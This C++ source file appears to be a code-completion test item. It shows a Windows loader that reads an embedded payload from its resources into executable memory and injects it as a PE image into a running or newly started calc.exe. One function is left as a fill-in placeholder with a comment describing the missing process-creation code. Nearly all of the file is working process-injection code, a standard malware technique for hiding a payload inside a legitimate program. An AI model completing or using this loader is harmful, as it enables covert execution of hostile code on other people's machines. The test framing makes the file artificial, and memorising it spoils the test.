#include <windows.h>
#include <stdio.h>

#include "resource.h"
#include "inject_pe.h"
#include "target_util.h"
#include "enumproc.h"
#include "sysutil.h"

BYTE* get_raw_payload(OUT SIZE_T &res_size)
{
    HMODULE hInstance = GetModuleHandle(NULL);
    HRSRC res = FindResource(hInstance, MAKEINTRESOURCE(MY_RESOURCE), RT_RCDATA);
    if (!res) return NULL;

    HGLOBAL res_handle  = LoadResource(NULL, res);
    if (res_handle == NULL) return NULL;

    BYTE* res_data = (BYTE*) LockResource(res_handle);
    res_size = SizeofResource(NULL, res);

    BYTE* out_buf = (BYTE*) VirtualAlloc(NULL,res_size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    memcpy(out_buf, res_data, res_size);

    FreeResource(res_handle);
    return out_buf;
}

//Call the get_calc_path function to obtain the path to calc.exe, and then use the create_new_process1 function to create a new process. After successful creation, save the handle of the main thread in the mainThread variable and return the handle of the new process.
HANDLE make_new_process(HANDLE &mainThread)
{
    <FILL_HERE>
	return pi.hProcess;
}

int main(int argc, char *argv[])
{
    BYTE* res_data = NULL;
    SIZE_T res_size = 0;

    if ((res_data = get_raw_payload(res_size)) == NULL) {
        printf("Failed!\n");
        return -1;
    }
    if (!is_compiled_32b()) {
        printf("[ERROR] Not supported! Compile the loader as a 32 bit application!\n");
        system("pause");
        return (-1);
    }
    //we may inject into existing process
    HANDLE hProcess = find_running_process(L"calc.exe");
    HANDLE mainThread = NULL;
    if (!hProcess) {
        //or create a new one:
        hProcess = make_new_process(mainThread);
    }
    if (inject_PE32(hProcess, res_data, res_size)) {
        printf("Injected!\n");
    } else {
        printf("Injection failed\n");
    }

    //in case if the injection was to a new process
    //we may like to resume it's main thread
    if (mainThread) {
        ResumeThread(mainThread);
    }
    CloseHandle(hProcess);
    VirtualFree(res_data, res_size, MEM_FREE);
    system("pause");
    return 0;
}